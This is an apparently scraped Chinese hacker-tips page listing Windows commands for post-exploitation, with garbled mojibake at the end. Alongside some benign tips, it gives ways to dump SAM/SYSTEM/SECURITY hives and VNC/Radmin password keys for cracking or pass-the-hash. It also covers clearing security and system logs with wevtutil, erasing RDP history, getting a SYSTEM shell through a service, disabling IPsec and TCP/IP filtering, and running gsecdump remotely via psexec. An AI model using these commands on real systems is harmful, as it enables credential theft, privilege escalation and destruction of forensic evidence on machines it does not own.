psexec复制到system复制不了32就行了吗

记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华
[ 文章作者:Robot 本文版本:v1.0 最后修改日期: 转载请注明原文链接: ]1.局域网文件续传问题由于我们经常会拷贝数据,当文件比较大的时候,有时候会因为链接被断开了。导致了文件下载失败了。于是我们就会想到文件续传的问题。我们可以通过第三方软件,不过那个会比较麻烦,为了方便。我查了下资料系统自带的命令copy就可以实现文件的续传使用命令如下:# 将serverip上的文件夹floder复制到本地的d:\file\copy /z \\serverip\folder\* d:\file\ 2.DOS进入带空格或常文件名window读取长目录文件名的方法,比较常见的比如目录下program files,这个中间带了空格,比如我们需要进入C:\program files\folder目录,我们可以通过两种方式:cd c:\progra~1\folder\ # 方法一cd c:\”program files”\folder\ # 方法二3.常用几个注册表键值VNC:HKEY_LOCAL_MACHINE\SOFTWARE\VNC\WinVNC4\passwordRAdmin:HKEY_LOCAL_MACHINE\SYSTEM\Radmin\V2.0\Parameters\Parameter #密码HKEY_LOCAL_MACHINE\SYSTEM\Radmin\V2.0\Parameters\port # 端口读取完可以选择破解或者不破解都可以,或者直接用HASH版本登录。另外说下,VNC和Radmin在国外用得多,不像国人都喜欢3389.而且VNC在Linux也是常有的。当然PcAnyWhere也是国外常用。顺带提下关于3389登录记录的删除:reg delete “HKCU\Software\Microsoft\Terminal Server Client” /f当然了有些时候有些服务并没有,那么你net start一下把所有有Symantec的都关闭就ok了,用批处理效果好点。4.window导出hash的注册表方法导出hash除了利用工具,比如gethash,pwdump等外,我们可以通过注册表导出,还是有两种方法:reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” d:\users.reg #2003适用手工获取系统HASHreg save hklm\sam sam.hivereg save hklm\system system.hivereg save hklm\security security.hive得到hash方法:5.Win7和win2K8命令行清除日志方法看SECURITY日志的详细信息:C:\Windows\system32&wevtutil gl securityname: securityenabled: truetype: AdminowningPublisher:isolation: CustomchannelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0×5;;;BA)(A;;0×1;;;S-1-5-32-573)logging:logFileName: %SystemRoot%\System32\Winevt\Logs\security.evtxretention: falseautoBackup: falsemaxSize: publishing:fileMax: 1#清空SECURITY/SYSTEM/APPLICATION日志:C:\Windows\system32&wevtutil cl securityC:\Windows\system32&wevtutil cl systemC:\Windows\system32&wevtutil cl application6.提升cmd权限为system# tested on win7(32bit),win2k3,winxp sp3To get a DOS Prompt as NT system:C:\&sc create shellcmdline binpath= “C:\WINDOWS\system32\cmd.exe /K start” type= own type= interact[SC] CreateService SUCCESSC:\&sc start shellcmdline[SC] StartService FAILED 1053:The service did not respond to the start or control request in a timely fashion.C:\&sc delete shellcmdline[SC] DeleteService SUCCESS————Then in the new DOS window:Microsoft Windows XP [Version 5.1.2600](C) Copyright
Microsoft Corp.C:\WINDOWS\system32&whoamiNT AUTHORITY\SYSTEM7.安装telnet:servermanagercmd -i telnet_serversc querysc config tlntsvr start=autonet start tlntsvr8.tasklist,taskkill#此命令可以获取每个进程中主持的服务tasklist /svc # 结束cmd.exe的所有进程taskkill /f /im cmd.exe9.开了3389无法登录原因和解决办法通常通过命令netstat -ano看到3389端口就说明已经开启的远程管理,当然是端口没有修改的情况了.但是经常我们还是会碰到无法连接情况,本文就增对可能遇到的情况进行一些说明,包含问题和解决的思路办法,要根据实际情况灵活应变.9.1.情况一:服务器处在内网中思路:通过端口反弹到你本机,利用Lcx反弹是最常见的手法,另外如果你有同一个网络的肉鸡那么同样也是可以的.9.2.情况二:做了IP安全策略思路:停止IP安全策略服务即可,命令:net stop policyagent9.3.情况三:系统防火墙的拦截思路:同情况一的思路一致9.4.情况四:系统用户只设置了某些用户才能登陆9.5.情况五:系统做了TCP/IP筛选思路:通过注册表导出关键键值来判断是否使用了TCP/IP筛选regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpipregedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpipregedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip下载这3个文件编辑找到EnableSecurityFilters的字段,查看其值是否为,如果为就说明管理员做了tcp/ip筛选,我们只要把1改成0就行了。其他2个文件也和第一个文件一样修改即可。上面总结的情况都是一些比较常见的,解决的思路也是比较常见。如果您还遇到其他问题欢迎一起讨论解决。10.域渗透中常被忽视几个有用命令在域渗透过程中我们经常为了分析域的信息,有些是GUI工具的,不过我们在命令行下也完全可以做到。其实微软给我们提供了强大的域管理工具cmdline下的。本文主要介绍几个工具:nltest.exe简介:这个工具获得域在森林中的信息,信息可谓是样样齐全。同时可以通过它获得用户的hash如果得到hash可以尝试一下这个。但是有时候改程序并没有包含在系统里面,因为他是在window 2003的扩展包中,需要自行提取出来。ldifde.exe简介:域环境下的活动目录管理工具,可以修改、同步、删除等操作fsutil.exe简介:用于FAT和NTFS磁盘管理方面psexe.exe简介:这个可能不能算是ms的工具,一个远程命令执行的工具,其身后还有pstools的强大的工具包。重点说一下nltest.exe参考:/zh-cn/library/cc731935# 查看域domain-a域控制器nltest /dclist:domain-a#显示有关特定用户的详细的信息。这里可以得到用户的完整HASH哦nltest /user:”TestAdmin”#列出了为您的域建立的信任关系。nltest /domain_trusts# 查询的域名系统 (DNS) 服务器列表中的域控制器和其相应的 IP 地址。 此参数还联系,检查连接的每个域控制器nltest /dsgetdc:abcDC: \\server-c95b23ad.abcAddress: \\192.168.1.10Dom Guid: b5--2f78bb702cacDom Name: abcForest Name: abcDc Site Name: Default-First-Site-NameOur Site Name: Default-First-Site-NameFlags: PDC GC DS LDAP KDC TIMESERV GTIMESERV WRITABLE DNS_DC DNS_DOMAINDNS_FOREST CLOSE_SITE你看到该信息就知道意味这什么===============================================================================ldifde 我就不多废话,自己看下MS官方说明。===============================================================================Fsutil可执行文件分配表 (FAT) 和 NTFS 文件系统,例如管理重分析点,管理稀疏文件,或卸载卷相关的任务。 如果使用不带参数,则fsutil显示受支持的子命令的列表。C:\&fsutil—- Commands Supported —-behavior Control file system behaviordirty Manage volume dirty bitfile File specific commandsfsinfo File system informationhardlink Hardlink managementobjectid Object ID managementquota Quota managementreparsepoint Reparse point managementsparse Sparse file controlusn USN managementvolume Volume managementC:\&fsutil fsinfodrivers is an invalid parameter.—- FSINFO Commands Supported —-drives List all drivesdrivetype Query drive type for a drivevolumeinfo Query volume informationntfsinfo Query NTFS specific volume informationstatistics Query file system statisticsC:\&fsutil fsinfo drivesDrives: A:\ C:\ D:\C:\&11.psexec 远程命令执行psexec \\COMPUTER -u user -p password -d -f -c gsecdump.exe -a &x.TXTpsexec \\computer -u user -p password -d cmd.exe 相关日志
阅读:15362 | 评论:0 | 标签:
想收藏或者和大家分享这篇好文章→
?微信扫一扫,快速掌握黑客技术?甯哥敤鍏ヤ镜鍛戒护鍜屾枃绔犳敹钘忓寘锛峱sexec銆愬惂銆慱鐧惧害璐村惂
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&绛惧埌鎺掑悕锛氫粖鏃ユ湰鍚х?涓??鍒帮紝鏈?惂鍥犱綘鏇寸簿褰╋紝鏄庡ぉ缁х画鏉ュ姫鍔涳紒
鏈?惂绛惧埌浜烘暟锛

我要回帖

更多关于 无法复制system 的文章

 

随机推荐